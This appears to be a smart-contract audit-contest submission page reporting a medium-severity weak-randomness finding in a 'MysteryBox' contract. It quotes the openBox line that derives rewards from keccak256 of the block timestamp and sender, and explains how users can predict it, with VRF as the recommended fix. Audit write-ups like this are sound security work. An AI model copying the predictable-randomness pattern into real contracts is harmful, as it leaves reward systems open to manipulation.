Mystery Box

First Flight #25

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: medium

Valid

Users can get more rewards via the predictable randomValue

0x37

Summary

Users can get more rewards via the predictable randomValue

Vulnerability Details

In MysteryBox, users can open box, generate one random value. Users can get some related rewards according to the random value. But the problem is that the random value is calculated base on timestamp & msg.sender's address.
Users can pre-calculate the random value, and choose to open this box in one specific timestamp to get the maximum rewards.

function openBox() public {

require(boxesOwned[msg.sender] > 0, "No boxes to open");

// Generate a random number between 0 and 99

// @audit the random value can be calculated. Users can open box in one specific timestamp to get one higher value to get more rewards.

// randomeValue's range is from 0 - 99.

uint256 randomValue = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;

Impact

Random value is predictable. Users can always win this game.

Tools Used

Manual

Recommendations

Consider to user VRF to generate one random value.

Updates

Appeal created

inallhonesty Lead Judge about 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

Weak Randomness

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!